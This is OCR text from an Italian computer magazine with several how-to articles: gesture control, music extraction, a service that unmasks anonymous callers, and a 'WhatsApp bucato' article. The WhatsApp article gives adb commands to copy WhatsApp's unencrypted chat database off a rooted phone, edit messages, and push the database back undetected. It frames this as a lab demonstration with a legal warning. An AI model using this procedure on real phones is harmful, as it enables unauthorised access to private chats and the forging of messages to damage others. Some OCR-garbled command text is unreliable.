la barra in basso. Per condividere una foto 
dalla galleria selezioniamo Add from Galleryo sce¬ 
gliamo Take Picture. Selezioniamola, attendiamo¬ 
ne il caricamento e premiamo il pulsante giallo per 
iniziare la condivisione con i dispositivi in ascolto! 


Il PC si comanda con la mano! 

Siamo pronti adire addio mouse e tastiera? Adesso basta utilizzare la Webcam per controllare le applicazioni 
preferite. Ecco come fare utilizzando il tool Flutter. 



^ È sufficiente il primo avvio 

Assicuriamoci che la Webcam sia collegata 
al PC ed estraiamo l’archivio Flutter.zip (lo 
troviamo sul DVD allegato), quindi eseguiamo il file 
Flutter.msi che installerà il software senza richie¬ 
dere ulteriori interventi, conducendoci al tutorial di 
configurazione. 



^ Basta “prenderci la mano” 

2 Clicchiamo l’m Ready e posizioniamo la 
mano davanti alla Webcam a circa un metro 
di distanza, così come mostrato nelle illustrazioni 
d’esempio. I gesti richiesti sono gli stessi che ci con¬ 
sentiranno di avviare/arrestare la riproduzione dei 
brani e passare a quello successivo o precedente. 



^ Il pot er e... in una mossa! 

Finita l’esercitazione, Flutter resterà attivo 
nella barra delle applicazioni, intervenendo 
solo se necessario. Avviando iTunes, Windows Media 
Player, VLC, Spotify oppure Chrome (YouTube e altri), 
entrerà in azione captando i gesti delle nostre mani 
e impartendo i comandi ai media player. 
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Il passepartout musicale! | Fai da te 


Così fa l'hacker 



-x I contenuti si condividono così 

4 Allo stesso modo spiegato nel passo preceden¬ 
te potremo condividere i contenuti: chi li riceverà 
dovrà anch’egli aver installato Chirp sul proprio dispositi¬ 
vo e tenere l’app aperta, che sì occuperà di restare sem¬ 
pre in ascolto. 



.x Il clone di Tone su smartphone 

Sulla stessa riga di Tone, anche con Chirp è possibile 
inviare link allo stesso modo di note e foto. Risulterà 
forse un po’ meno intuitivo, ma niente di trascendentale: dal 
solito menu scegliamo AddLinke incolliamo l’indirizzo del sito 
che vogliamo condividere. 



FACCIO TUTTO 
CON LE MANI 

Se vogliamo un'in¬ 
terazione col nostro 
smartphone Android 
in stile Star Trek, 
potremmo optare per 
Hovering Controls. È 
una semplice app che 
sfrutta la fotocamera 
frontale del telefono e 
il sensore di prossimità, 
grazie ai quali riconosce 
i movimenti della mano 
permettendo di asso¬ 
ciare azioni specifiche a 
eventi specifici. Basterà 
lasciare il telefono sul 
tavolo e sventolare la 
mano a destra o sinistra 
per cambiarci brani in 
esecuzione o avviare 
un'app muovendo la 
mano in senso circolare, 
e cosi via. 


CON SEMPLICI GESTI IL PC È Al TUOI ORDINI 

Posizionando la mano davanti alla Webcam e utilizzando Flutter, 
oltre a controllare applicazioni come iTunes, Windows Media Player e 
Winamp o Spotify, adesso possiamo impartire dei comandi per alcuni 
servizi Web. Vediamo quali sono. 



VouM 



numi 


P QGrooveshark 



AVANTI 

(VIDEO/CANZONE 

SUCCESSIVA) 


INDIETRO 

(VIDEO/CANZONE 

PRECEDENTE) 




LA WEBCAM CHE GUARDA 
AL FUTURO 


Intel con la collaborazione di 
Creative, ha sviluppato Real- 
Sense, un'avveniristica Web¬ 
Cam che permette di "estrarre" 
la tridimensionalità di un am¬ 
biente o di uno spazio ester¬ 
no e apre in realtà le porte 
a una miriade di possibilità, 
tutte molto stimolanti. La più 
ovvia è quella di cambiare il 
fuoco di una foto già scattata, 
cosa che peraltro fanno già 
diversi smartphone, seppur 
con tecnologie diverse. Tut¬ 
tavia RealSense consentirà 
molto di più, perché la ca¬ 
pacità di rilevare l'ambiente 
nella sua spazialità renderà 


possibile ad esempio elimi¬ 
nare selettivamente uno dei 
piani che lo compongono, per 
rimuovere oggetti o persone 
indesiderate in uno scatto ma 
anche per consentirci di ef¬ 
fettuare una videochiamata 
di lavoro da casa invece che 
dall'ufficio, eliminando detta¬ 
gli personali dalla ripresa. Gli 
utilizzi più avveniristici sono 
sicuramente quelli che hanno 
a che fare con la cosiddetta 
realtà aumentata e con il ri¬ 
conoscimento delle gesture, 
per interagire con i device in 
maniera touchless e anche a 
distanza. 
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O Così fa Thacker 


Software | Ashampoo Music Studio 5 


Ecco come estrarre i brani audio dai nostri video preferiti 

per creare una compilation musicale personalizzata 


Dal DVD Video 
al CD Audio 


Cosa ci 
occorre 



FACILE 


EDITOR AUDIO 

ASHAMPOO 
MUSIC STUDIO 5 


✓DVD 

Wibiy/d;l*l»lflwa» 


Sito Internet: 

www.ashampoo.com 



Q uante volte abbiamo pensato: "che bella 
la musica di questo video, mi piacerebbe 
poterla ascoltare da CD o tramite il lettore 
MP3”. Per mettere in pratica un simile intento 
c’è bisogno di un editor in grado di trasforma¬ 
re l'audio presente in qualsiasi filmato in una 
traccia musicale dal formato standard, che 
successivamente possiamo tranquillamente 
masterizzare su un supporto tradizionale, come 
ad esempio un Compact Disc, oppure trasferire 
direttamente nel player portatile. Roba da studio 
di registrazione professionale? Forse sì, ma per 
fortuna possiamo allestirne uno direttamente 
nel nostro computer! Win Magazine ci regala 


Ashampoo Music Studio 5 che in pochi clic ci 
permetterà di creare la nostra personalissima 
compilation musicale. Grazie alla sua interfaccia 
semplice e intuitiva, anche operazioni come 
queste, che possono irretire e demotivare i meno 
esperti, diventano davvero un gioco da ragazzi 
alla portata di chiunque. 

Estrai, converti e masterizza 

Terminata l’estrazione dell’audio da una sor¬ 
gentevideo, è possibile tagliarla e organizzarla 
in tracce separate, ma anche ottimizzarla con 
funzionalità ad hoc per una migliore resa 
sonora. Music Studio 5 è anche un provetto 


Organizer, che consente di gestire al meglio 
l'intera raccolta musicale presente nel tuo 
computer. E non finisce qui. Se lo desideri puoi 
anche registrarti quando canti o mente suoni 
uno strumento musicale. E ancora, realizzare 
dei missaggi di più brani da utilizzare per 
feste e intrattenimento. Tra le funzionalità 
di "servizio”, inoltre, spiccano quella per la 
creazione di copie di sicurezza dei propri CD 
musicali e per la realizzazione delle coper¬ 
tine. Insomma, un software all-in-one che 
trasforma il tuo PC in una stazione di lavoro 
per organizzare ed elaborare al meglio tutta 
la tua musica. 


Richiediamo il codice seriale 

La procedura di registrazione di Ashampoo Music Studio 5 richiede pochi minuti ed è completamente gratuita. 
Una volta terminata potremo utilizzare il software senza alcun limite di tempo e funzionalità. 



Avviamo l'installazione 

Clicca due volte sul file ashampoo_ 
music_studio_5_1 9220.exe che trovia¬ 
mo ne\\'Interfaccia principale del Win DVD-Rom. 
Semplici istruzioni a video ci permetteranno di 
registrare la nostra copia e godere di tutte le sue 
funzionalità senza limiti di tempo. 


^ Una breve registrazione 

Per continuare l’istallazione clicchiamo 
Ottieni una chiave di attivazione gratu¬ 
ita. Nella pagina Web visualizzata inseriamo un 
indirizzo e-mail, nello spazio sotto Ottieni la tua 
chiave di versione completa ora, e clicchiamo 
su Richiedi chiave per versione completa. 


Ecco il nostro codice seriale 

Possiamo terminare la registrazione inse¬ 
rendo i dati richiesti. Ottenuto il codice di 
attivazione da inserire nel programma, copiamolo 
negli appunti (Ctrl+C) torniamo all'installazione 
del software e clicchiamo Copia dagli Appunti e 
poi Attiva Ora! e il gioco è fatto. 
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Così fa l'hacker O 


Estraiamo l’audio da un video 


Music Studio 5 permette di caricare video in svariati formati, tra cui MPEG-2 ed MPEG-4, ed estrapolarne l’audio 
per trasformarlo in una traccia autonoma. Vediamo come procedere. 



Music Stuolo 5 > Video—>Music 
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Music Stu8t5'5 > Video—> Music 


Mettiamoci all’opera 

Per prima cosa avviamo il programma. 

Nell’interfaccia principale cucchiamo il 
pulsante Video/Music. Clicchiamo ora su Fai clic 
qui per aprire un file video. Selezioniamo il filma¬ 
to che desideriamo caricare e clicchiamo Apri. 
Terminata l’estrazione clicchiamo Avanti. 


^ Scegliamo il formato 

Selezioniamo il formato di salvataggio del¬ 
la traccia cuccando uno dei pulsanti sot¬ 
to Formato di emissione , ad esempio MP3. Ora 
selezioniamo la qualità di finalizzazione cliccando 
uno dei pulsanti Media, Buona , CD o Alta Qua¬ 
lità. Fatto questo clicchiamo Avanti. 


^ Salviamo la traccia 

Nella nuova schermata selezioniamo la 
cartella di destinazione per il salvatag¬ 
gio della traccia audio estratta. Cliccando Avan¬ 
ti ì\ software procede al salvataggio del file nella 
posizione scelta. Torniamo quindi al menu princi¬ 
pale cliccando Vai al menu principale. 


Creiamo il nostro CD Audio 


Estratte le tracce audio dai tuoi filmati non resta che creare una compilation da finalizzare su un supporto standard, 
ad esempio un CD audio, che possiamo ascoltare in auto o sul nostro impianto Hi-Fi di casa. 



] 


Music Stu9t5 5 > Masterizza CD Au< 



Masteri//azione CD Audio... 


^ Scegliamo il tipo di supporto 

Per prima cosa dobbiamo tornare al menu 
principale e cliccare il pulsante Masterizza. 
A questo punto il sistema propone diversi tipolo¬ 
gie di masterizzazione. Nel nostro caso clicchia¬ 
mo il pulsante Masterizza CD Audio, il primo che 
vediamo a sinistra. 


^ Aggiungiamo le tracce 

Se le tracce estratte si trovano in cartelle 
diverse clicchiamo Aggiungi File e selezio¬ 
niamole una a una. Se invece si trovano tutte nella 
medesima directory clicchiamo Aggiungi Cartella 
e selezioniamo quella che le contiene tutte. Clic¬ 
chiamo Avanti. 


^ E ora si masterizza! 

2 Inseriamo un CD vuoto nel masterizzato- 
re. Seleziona l’unità di scrittura e clicca su 
Avanti. Il processo di scrittura ha inizio. Una volta 
terminato, estraiamo il CD dal lettore e torniamo 
al menu principale cliccando sul pulsante Vai al 
menu principale. 
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WhatsApp bucato 



Centro sicurezza 
Win Magazine 



Whatsapp 

bucato! 

Trovato il modo per accedere alla 
cronologia delle Chat del noto social, 
manipolare i testi delle conversazioni 
e... rovinare la reputazione altrui 


Cosa ci 
occorre 

EDITOR SQL 

SQLITESTUDIO 

CD «■'DVD 

Sito Internet: 

http://sqlitestudio.pl 

DEBUGGER ANDROID 

ADB 

«MB) 

Sito Internet: 

http://developer. 

android.com 


N egli ultimi tempi, WhatsApp 
sembra essere diventato il 
bersaglio preferito di pirati e 
smanettoni interessati a sbirciare 
nelle conversazioni altrui. Su Win 
Magazine 210, ad esempio, abbia¬ 
mo scoperto quanto è facile spiare 
le chat e rubare contenuti personali 
utilizzando tecniche tutt'altro che 
avanzate. Ora la famosa app di mes- 
saggistica istantanea è di nuovo sotto 
tiro per colpa di una vulnerabilità 
che permette di accedere all’archivio 
delle conversazioni e modificarne 
il contenuto, anche se queste sono 
già state visualizzate da entrambi i 
membri della chat, con conseguen¬ 
ze facilmente immaginabili per la 
povera vittima di turno! Ad un ma¬ 
lintenzionato basta mettere le mani 
sullo smartphone per i pochi secon¬ 
di sufficienti a copiare sul proprio 
PC il database con tutti i messaggi 
archiviati, modificarne qualcuno, 
aggiornare l’archivio e rimettere tutto 
a posto. Pochi e semplici passaggi 
sufficienti per rovinare la reputa¬ 
zione altrui. È comunque doveroso 
precisare che è possibile effettuare 
tale modifica soltanto su dispositivi 
Android ai quali siano stati concessi i 
permessi di super user, il noto "root” 
per intenderci (una procedura che è 
ormai alla portata di tutti). 

La "magia” è resa possibile dal 
fatto che Whatsapp memorizza i 
messaggi delle varie conversazio¬ 
ni aH’interno di un database non 


crittografato, che a sua volta viene 
memorizzato in chiaro in una del¬ 
le directory del sistema operativo. 
Si tratta quindi di prelevare tale 
file, modificarlo a proprio piaci¬ 
mento sul computer e reinserirlo 
modificato all’interno dell’app sul 
dispositivo, cosicché le conversa¬ 
zioni risultino manipolate rispetto 
a quelle originali. 

Per quale motivo 
taroccano i messaggi? 

Le motivazioni sono diverse: si po¬ 
trebbe, ad esempio, voler alterare 
un messaggio per nascondere un 
tradimento amoroso, oppure per un 
semplice scherzo tra amici vantan¬ 
dosi di una fantomatica "avventura”. 
Come sempre, però, non tutti han¬ 


no intenzioni benevole ed eventuali 
malintenzionati potrebbero voler 
alterare conversazioni di WhatsApp 
contenenti messaggi illegali o mina¬ 
tori. Anche se alterati, infatti, i mes¬ 
saggi risulterebbero autentici non 
solo ai profani, ma anche agli occhi 
di un esperto informatico che erro¬ 
neamente potrebbe certificare che 
il testo non ha subito alcun tipo di 
manipolazione. Per fortuna in Italia i 
messaggi scambiati su Whatsapp (e in 
generale quasi tutte le comunicazioni 
digitali) non sono ammissibili come 
prove in tribunale. 

Ecco come proteggersi 
dai manipolatori di chat 

Ciò non toglie che è sempre fon¬ 
damentale prendere le neces- 


ATTENZIONE! 

Accedere ai messaggi che qualcun altro si scambia via WhatsApp potrà anche essere 
facile - almeno per qualcuno - ma, salvo a non avere il permesso del titolare dell'account, 
è illecito almeno quanto leggere la posta elettronica diretta a qualcun altro. E può 
costare caro! Chi, infatti, accede agli altrui messaggi salvati su un telefonino compie 
un'interminabile sequenza di reati che vanno dall'accesso abusivo ad un sistema 
informatico, alla violazione delle altrui comunicazioni elettroniche e/o 
corrispondenza telematica, passando per la violazione della privacy. Se 
poi, oltre ad accedere, si modifica anche il contenuto dei messaggi, 
all'elenco che precede, si rischia di dover aggiungere anche il falso 
materiale e/o ideologico. Insomma, magari sembrerà anche un 
gioco, ma davvero non lo è. 

Avv. Guido Scorza 
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| WhatsApp bucato 


Così fa l'hacker O 


□ Violare il database delle chat 


Innanzitutto occorre scaricare ed installare sul PC i driver e i programmi necessari per riconoscere lo 
smartphone, accedere alla sua memoria interna e prelevare il file contenente le conversazioni di WhatsApp. 
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^ Il kit dell’hacker 

Dalla sezione Antivirus&Sicurezza scarichia¬ 
mo l’archivio compresso WhatsKitzip. Al suo 
interno troveremo tutti i software da installare sul 
computer e necessari per eseguire la procedura di 
accesso alla memoria dello smartphone. Estraiamo 
quindi il l’archivio sul Desktop del nostro computer. 


^ Il prompt comandi Android 

Entriamo nella nuova directory WhatsHacke 
installiamo il file ADB.exe con un doppio clic 
su di esso. Si avvierà una classica Shell dei coman¬ 
di: alla richiesta di installazione del tool e dei vari 
componenti premiamo semplicemente il tasto Ksulla 
tastiera e confermiamo premendo Invio. 


Ecco il driver giusto 

Ultimiamo l’installazione dei driver Android 
seguendo le istruzioni a video. Al termine, 
colleghiamo lo smartphone al PC. Nel menu Start 
selezioniamo col tasto destro l'icona Computer e 
cucchiamo Proprietà. In Gestione Dispositivi , veri¬ 
fichiamo che i driver siano installati correttamente. 


sarie precauzioni per evitare di 
ritrovarci nostro malgrado in 
una così spiacevole situazione. 
Innanzitutto, evitiamo di lascia¬ 
re incustodito lo smartphone e 
ricordiamoci sempre di attivare 
il blocco dello schermo: ad un 
eventuale malintenzionato, in¬ 
fatti, serve dare le autorizzazioni 
di super user per poter accedere 
all’archivio delle conversazioni e 
l’unico modo per impedirlo è, ap¬ 
punto, l’uso di un PIN, una pas¬ 
sword o una sequenza di sblocco. 
Per verificare la reale pericolosità 
di questa vulnerabilità abbiamo 
quindi deciso di "sacrificare" uno 
smartphone simulando un attacco 
nei nostri laboratori e riuscendo a 
manomettere in maniera davvero 
semplice il database di WhatsApp. 
Vale la pena ricordare a tutti che le 
procedure descritte nell’articolo 
vengono presentate esclusiva- 
mente a scopo illustrativo e pos¬ 
sono essere messe in pratica solo 
sui nostri dispositivi o su quelli di 
amici informati di quanto stiamo 
facendo. 


COSI INSTALLIAMO I DRIVER ANDROID ANCHE 
SU WINDOWS 8 E10 


Impostazioni di avvio 


La procedura appena vista nel Macropasso prece¬ 
dente potrebbe non funzionare se sul computer è 
installato Windows 8/8.1 oppure 10. In questi casi 
occorre impostare il sistema operativo per consentire 
l’installazione di software anche da sorgenti non 
certificate da Microsoft. In particolare, se abbiamo 
Windows 10, cerchiamo Impostazioni nel campo 
di ricerca della barra delle applicazioni e selezionia¬ 
mo questa voce nei risultati. Accediamo quindi alla 
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sezione Aggiornamento e Sicurezza/Ripristino e 
in Avvio avanzato clicchiamo Riavvia ora. Dopo il 
riavvio del PC e la visualizzazione della schermata 
Scegli un'opzione selezioniamo Risoluzione dei 
problemi/Opzioni avanzate/lmpostazioni di avvio 
e clicchiamo Riavvia. Dopo il riavvio del PC, nella 
schermata Impostazioni di avvio premiamo il tasto 
7 sulla tastiera per disabilitare l'imposizione della 
firma dei driver. Verrà così completato il riavvio di 
Windows 10. A questo punto possiamo procedere 
con l'installazione dei driver Android seguendo la 
procedura del Macropasso precedente. ► 
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[ WhatsApp bucato 


Così si tarocca un messaggio 

Installati i driver Android sul computer, siamo pronti per scaricare dalla memoria dello smartphone il database 
con tutte le conversazioni di Whatsapp, per modificarle senza lasciare alcuna traccia! 



1 ■ Amministratore: Prompt dei comandi 


39 C:\WINDOWS\system32\cmd.exe • adb shell 

C:\adb>adb devices 


C* *V*db)A(lb '.‘Iteli 

«-7*lr«-l999 ;999M* tbn 

List of deuices attached 



59312f94 deuice 


*-?«-[i»«-[999:999H*-[6n 

C:\adb> 


«-8**ootPA0001 :/ Il 


-x Il promot comandi di Android 

Se i driver USB sono correttamente installa¬ 
ti, rechiamoci nella directory C:\adbi Tenendo 
premuto i tasti Ctrl+Shift, clicchiamo col tasto destro 
del mouse in un’area vuota della finestra e selezionia¬ 
mo l'opzione Apri finestra di comando qui dal menu 
contestuale che appare. 


^ Il telefono è collegato al PC? 

Digitiamo nella Shell il comando adb devices 
e clicchiamo Invio. Controlliamo che sotto la 
stringa List of devices attached compaia un codice 
identificativo, che rappresenta il nostro smartphone. Se 
non rileviamo nulla, controlliamo di avere i permessi di 
root sul dispositivo. 


^ Diventiamo super utenti! 

Digitiamo il comando adb Shell e premiamo 
Invio. Controlliamo sul display dello smart¬ 
phone e autorizziamo il computer alla comunicazione 
cliccando su Autorizza. Per accedere al dispositivo in 
modalità Super User, digitiamo nella Shell il comando 
su e conferiamo con Invio. 


Hi C:\WlNDOWS\jystem32 -cm&ece 


C:NAdb>«db shell 

• 7* tr* 1779 ;777ll* IGn 

• Osile 11PA0001 :*• $ su 
su 

»-7*-[r«-I9?? i?77H*-I6n 

'UruulPftBOOl ./ ■ cp /ddld/ildlii/iun. wImI supp/dul<ibr 
i. p /(Idlo/ilala/cun.whdlsapp/iIdliibdscs/nsy^lure.Uli / 
ruuiPA0081 •/ ■ exil 
exit 

^he 11 PA 8001 ./ $ exit 
exit 

C:\4db> 




-x Ecco rarchivio delle chat 

^ Sempre nella Shell digitiamo cp /data/data/ 
com. whatsapp/databases/msgstore.db / 
sdcard/e premiamo Invio. Usciamo da adb digitando 
due volte exite premendo Invio. Quindi scriviamo adb 
pulì/sdcard/msgstore.db, in questo modo il database 
verrà salvato nella cartella C:\adb\ del PC. 



Un editor per il database 

IJ Entriamo nella cartella WhatsKit\SQLiteStudio 
estratta in precedenza e avviamo SQLiteStu- 
dio.exe. Dal menu in alto scegliamo Database/Add 
database. Clicchiamo sull’icona + ed esploriamo le 
cartelle del PC fino a raggiungere il file msgstore.db 
che si trova in C:\adb. Clicchiamo OK. 


;:virib>.tdb puah ni«9tore.db ^adcard/ 
MKII KRs% hplA* in 7.174* > 

JI\Adb> 


-x Troviamo i messaggi 

Clicchiamo Database/Connect thè databa¬ 
se e scorriamo l’elenco cliccando messag- 
ges. Dal tab DATA digitiamo il testo da modificare nel 
campo filterdata. Prendiamo nota dell’ID messaggio, 
clicchiamo due volte sul testo e modifichiamolo sem¬ 
plicemente sostituendolo col nuovo testo. 



x. La chat è stata modificata! 

Clicchiamo sull’Icona raffigurante una spun¬ 
ta verde (Commit) per salvare le modifiche 
apportate. Dal menu Database eseguiamo la discon¬ 
nessione cliccando sulla voce Disconnectfrom data¬ 
base, quindi chiudiamo il software SQLiteStudio e tor¬ 
niamo alla nostra Shell dei comandi Android. 


x. Rimettiamo le cose a posto 

g Riavviamo lo smartphone affinché tutte le app 
_ siano effettivamente chiuse. Dal PC digitia¬ 
mo in sequenza i comandi adb push msgstore.db / 
sdcard/ poi adb Shell, quindi digitiamo su ed infine 
cp /sdcard/msgstore.db /data/data/com. whatsapp/ 
databases, confermando ogni volta con Invio. 


-x Verifichiamo le modifiche 

0 Chiudiamo il prompt dei comandi digitando exit 
e premendo Invio. Scolleghiamo il telefono dal 
PC e avviamo Whatsapp. Scorriamo le conversazio¬ 
ni presenti e apriamo quella contenente i messaggi 
modificati. Se l’app rileva un’anomalia sul database, 
ripetiamo la procedura appena vista. ■ 
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PROGRAMMARE NON È MAI 

Studente.java:!: cannot inherit from final Persona 

public class Studente extends Persona { 

public final class Persona { 



String nome; 



iì-.,- ricala; 
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O Così fa Thacker 


Fai da te | Così ti sgamo il numero nascosto 


C'è un modo segreto per scoprire l'identità e il numero 

di chi ti "telefona con l'anonimo". Ecco come fare 


Così ti sgamo il 
numero nascosto 


T empi duri pergli stalkere per quei buontemponi che 
amano fare scherzi al telefono: grazie ad un nuovo 
servizio disponibile in Italia sarà possibile per chiun¬ 
que scoprire l'identità di chi chiama con numero anonimo. 
Fino a qualche anno fa per ottenere dati sensibili di questa 
natura bisognava presentare una denuncia presso l'auto¬ 
rità competente, produrre prove legate allo stalkeraggio 
(come registrazioni delle conversazioni e quant'altro) e ri¬ 
nunciare a conoscere l'identità del molestatore sperando 
che l'ammonizione del carabiniere potesse farlo desistere 
dal provarci ancora. 

La soluzione allo stalking 

Negli Stati Uniti, già da alcuni anni, esiste una tecnologia 
chiamata TrapCall che permette agli utenti registrati al ser¬ 
vizio di scoprire il numero del chiamante anonimo mediante 


un reindirizzamento di chiamata. C'è da fare una precisazio¬ 
ne: il suddetto servizio non funziona qualora il molestato¬ 
re decida di utilizzare cabine telefoniche o servizi VolP co¬ 
me Skype. Di recente anche in Italia è disponibile un servi¬ 
zio analogo, legalmente autorizzato e offerto dalla società 
Whooming (www.whooming.com), che promette e realiz¬ 
za i desideri di chi è stanco delle chiamate anonime. Per da¬ 
re la possibilità ai nostri lettori di testare il servizio, abbia¬ 
mo stretto un accordo con Whooming riuscendo ad otte¬ 
nere uno speciale coupon per usare il servizio fino al 20 di¬ 
cembre 2015 senza limitazioni temporali: potremo imme¬ 
diatamente scoprire chi ci chiama col numero anonimo! 
Ogni volta che riceveremo una telefonata da una numera¬ 
zione sconosciuta potremmo vedere in chiaro il numero ac¬ 
cedendo al nostro account Whooming o dal cellulare usan¬ 
do l'apposita appiediamo come smascherare gli anonimi. 


Cosa ci 
occorre FAC 

SERVIZIO ANTISTALKER 

WHOOMING 

Quanto costa: Gratuito 
fino al 20 dicembre 
2015 solo per i lettori 
di Win Magazine 
Sito Internet: 
www.whooming.com 



RICARICARE 
IL CREDITO 
WHOOMING 

Clicchiamo sul pulsante 
Ricarica dalla pagina 
principale del sito di 
Whooming e scegliamo 
il taglio da 5,10 o 25 
euro. Per il pagamento 
possiamo usare carta di 
credito o conto PayPal. 
La ricarica permette 
di usare tutti i sevizi 
aggiuntivi, cometa 
registrazione della chia¬ 
mata o il servizio Parla 
con lo stalker. 


Registriamoci al servizio e atti 

Per riscuotere il coupon riservato in esclusiva ai lettori di Win Magazine dobbiamo accedere al sito di Whooming 


Scopri chi ti chiama con il 
numero anonimo 


J 


WHAKI «m*n 0 rumerò a te m ere 



3. Inserisci numero: 

Nailon» di appartarne dal tuo pastora telefonico 


Castoro telefonico 


Il tuo numero di telefono (senza prefisso 
intemazionale) 


Hai bisogno di assistenza? 


c 


Codna 



^ Ecco la password di accesso 

Raggiungiamo il sito www.whooming.com e 
clicchiamo sul pulsante Registrati al centro 
pagina. Nella schermata successiva inseriamo un 
indirizzo e-mail valido (su tale casella di posta elet¬ 
tronica riceveremo la password di accesso al servi¬ 
zio) e clicchiamo di nuovo sul pulsante Registrati. 


^ Il nostro gestore telefonico 

Ricevuto il codice, effettuiamo il login al 
servizio con Accedi. Clicchiamo Aggiungi 
Numero e specifichiamo la Nazione di apparte¬ 
nenza, l'Operatore e il nostro Numero telefonico. 
Spuntiamo Accetto i termini e clicchiamo su 
Continua. 


^ Digitiamo il codice magico 

Nella schermata successiva scegliamo l'op¬ 
zione Deviazione su Occupato. Usando il 
tastierino del telefono digitiamo sullo smartphone il 
codice **67*0694802015#e tappiamo sulla cor¬ 
netta verde per eseguire il comando: un messaggio 
ci confermerà l'avvenuta attivazione del servizio. 
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GLI STRUMENTI GIUSTI PER SMASCHERARE GLI SCOCCIATORI 

Impariamo ad usare al meglio l'interfaccia di Whooming per mettere in chiaro i numeri di telefono anonimi. 



+ Aggiungi numero Elenco 



I miei numeri di telefono 

(+39) 

| V Ricevi SMS con il numero dello stalker 0 

□ Parla con lo stalker KB 

I Registra la chiamala con lo stalker 0 

| Q Ricevi SMS anche per chiamale non anonime Q 
1 1 Ricevi SMS e chiamate su un numero alternativo 0 

(+39) 33^^Bfr 

V Ricevi SMS con il numero dello stalker 0 
13 Parla con lo stalker 

□ Registra la chiamata con lo stalker 0 


Ricevi SMS anche per chia 
Ricevi SMS e chiamate su 


nate non anonime Q 
in numero alternativo Q 


O CONFIGURAZIONE 

Contiene tutti gli strumenti utili per dare filo da 
torcere a chi, un momento prima, si sentiva al 
sicuro dietro il proprio anonimato 

B ELENCO 

In questa sezione possiamo consultare lo storico 
delle chiamate ricevute con numero nascosto. 

Se abbiamo associato più dispositivi al servizio, 
dobbiamo scegliere il numero da controllare 

El RICEVI SMS 

L’opzione ha un costo di 20 centesimi (che 
vengono scalati dal conto Whooming) per ogni 
messaggio che riveli il numero del disturbatore 

El PARLA CON LO STALKER 

Permette di mettersi in contatto con lo 
scocciatore. L’opzione ha un costo di 20 centesimi 
per ogni minuto che passeremo al telefono con lui 

E3 REGISTRA LA CHIAMATA 
CON LO STALKER 

Funziona solo se è attiva l’opzione Parla con lo 
stalker. Il file audio della registrazione, in formato 
MP3, potrà essere scaricato dalla sezione Elenco 
chiamate. L’opzione ha un costo di 10 centesimi 

El RICEVI SMS ANCHE PER CHIAMATE 
NON ANONIME 

L’opzione permette di ricevere un SMS da 
Whooming anche nei casi in cui il Chiamante non 
sia arrivato con un numero anonimo. 

EX RICEVI SMS E CHIAMATE SU 
UN NUMERO ALTERNATIVO 

È possibile specificare un altro numero di telefono 
cui indirizzare tutti gli SMS. Attivare l’opzione 
non ha nessun costo se non quello legato alla 
ricezione deli’SMS che verrà comunque scalato 
dal credito Whooming. 


viamo la promozione 

ed effettuare una semplice registrazione gratuita entro il 20 dicembre 2015. Ecco i passi da seguire. 



Testiamo il servizio 

^ Da un secondo telefono (possiamo usare 
anche l’apparecchio di casa) componiamo 
il numero del cellulare appena configurato. Non 
ci interessa “nascondere” il numero: stiamo solo 
facendo una prova. Rifiutiamo la chiamata in 
modo da inoltrarla ai server di Whooming per 
essere processata. 


^ Cellulare pronto all’uso 

A questo punto il nostro numero di cel¬ 
lulare è stato configurato correttamente. 
Possiamo effettuare la verifica dal sito di Who¬ 
oming tramite il pulsante Configurazione. Da 
Componenti aggiuntivi (a sinistra) è possibile 
gestire i servizi extra da associare al numero (o 
ai numeri) registrati. 


Attiviamo la promo 

0 Non rimane che attivare la promozione 
esclusiva che Whooming entro il 20 di¬ 
cembre 2015. Clicchiamo sul pulsante Ricarica 
in alto a sinistra e digitiamo il codice WHOOMIN- 
G2015WM nel campo Hai un codice promo. 
Confermiamo cliccando sul pulsante accanto a 
forma di freccia. 
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WHOOMING SU 
CELLULARE 

Il servizio Whooming 
può essere attivato 
anche su smartphone 
Android,iOS e Windows 
Phone. Installando 
tale applicazione, sarà 
possibile accedere al 
pannello di controllo 
e verificare l'elenco 
chiamate, aggiungere 
un numero telefonico, 
attivare/disattivare 
funzioni extra del servi¬ 
zio e altro ancora. 


DISATTIVARE 
LA DEVIAZIONE 
DI CHIAMATA 


Nel caso in cui deside¬ 
riamo disattivare anche 
temporaneamente il 
servizio di deviazione 
delle chiamate sarà ne¬ 
cessario digitare sul te¬ 
lefono il codice ##002# 
e tappare sulla cornetta 
verde. Verrà comunica¬ 
to il buon esito dell'ope¬ 
razione. Per riattivare 
il servizio dovremmo 
nuovamente digitare 
il codice di deviazione, 
**67*0694802015# per 
tutti gli operatori ad 
eccezione di Tre per il 
quale bisogna digitare 
**67*0694802015*11#. 


Non sarà necessario 
confermare nuovamen¬ 
te il numero di telefono. 


Mai più telefonate anonime 

Il nostro telefono cellulare è pronto per scoprire l’identità di chi ci telefona nascondendosi dietro 
un numero anonimo. Ecco come sfruttare al meglio gli strumenti offerti dal servizio Whooming. 



^ Il codice per telefonate anonime 

Per testare l'efficienza del servizio, effettuiamo una 
chiamata anonima al nostro cellulare. Se telefoniamo 
da un dispositivo mobile dobbiamo usare il codice #31#nume- 
rotelefonoper “anonimizzarci nel caso di un apparecchio di 
rete fissa usiamo il codice *67#numerotelefono. Nel momento 
in cui il nostro cellulare inizia a squillare, rifiutiamo la chiamata. 


Ecco svelato il numero nascosto 

Accediamo al nostro account su www.whooming.com 
e spostiamoci nella sezione Elenco chiamate. In basso 
verrà visualizzato in chiaro il numero telefonico della persona 
che ci ha disturbato usando un numero anonimo, È possìbile 
controllare lo storico delle chiamate ricevute anche dal cellulare 
Android, installando l’app di Whooming dal PlayStore di Google. 


IN QUANTO TEMPO VIENE SMASCHERATO IL DISTURBATORE? 


TEMPO DI TRASPORTO INTERCONTINENTALE DELLA TELEFONATA 

0,085 secondi + 

TEMPO DI LATENZA INTRODOTTO DAI SISTEMI TELEFONICI 

0,090 secondi + 

TEMPO TECNICO DI SWITCHING ALL'INTERNO DEI SERVER (TRUNK) 

0,002 secondi = 

TEMPO TOTALE 

0,18 secondi 


Utilizzando il servizio Whooming, bastano poco meno di 2 decimi di secondo per smascherare lo stalker! 


COME FUNZIONA IL SERVIZIO OFFERTO DA WHOOMING? 

Lo abbiamo chiesto direttamente al team di Whooming. Ecco cosa ci hanno risposto. 


Whooming funziona grazie ad una batteria di server 
collegati su diversi TrunkSS7, una sorta di centro 
di smistamento digitale per le telefonate. I Trunk 
sono configurati in base alla Nazione da servire ed 
in base al carico generato dagli utenti di ogni Paese. 
Se l’utente è iscritto a Whooming ed ha configurato 
correttamente il proprio telefono, nel momento in 
cui esso riceve una chiamata anonima di disturbo 
e rifiuta la chiamata, fa innescare sul suo gestore 
